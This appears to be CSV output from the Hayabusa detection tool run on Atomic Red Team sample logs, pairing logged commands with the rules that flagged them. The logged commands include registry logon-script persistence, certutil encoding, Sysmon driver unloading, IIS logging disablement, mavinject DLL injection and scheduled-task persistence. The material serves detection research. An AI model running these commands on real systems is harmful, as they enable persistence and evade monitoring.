+2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG.exe  ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d  cmd.exe  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Commun Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_commun.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe  -encode c:\file.exe file.txt  :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe  -decode file.txt c:\file.exe  :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe  /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe  /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp  -decode c:\file.exe file.txt  :  Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd.exe  /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll  :  Path: C:\Windows\System32\mavinject.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT  :  Command: at  13:20 /interactive cmd  :  Path: C:\Windows\System32\at.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: SCHTASKS  /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: SCHTASKS  /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe  -a -c  :  Path: C:\Windows\System32\pcalua.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe  -a Java  :  Path: C:\Windows\System32\pcalua.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe  -a C:\Windows\system32\javacpl.cpl  :  Path: C:\Windows\System32\pcalua.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe  :  Path: C:\Windows\System32\forfiles.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe""  :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles  /p c:\windows\system32 /m notepad.exe /c  c:\folder\normal.dll:evil.exe  :  Path: C:\Windows\System32\forfiles.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
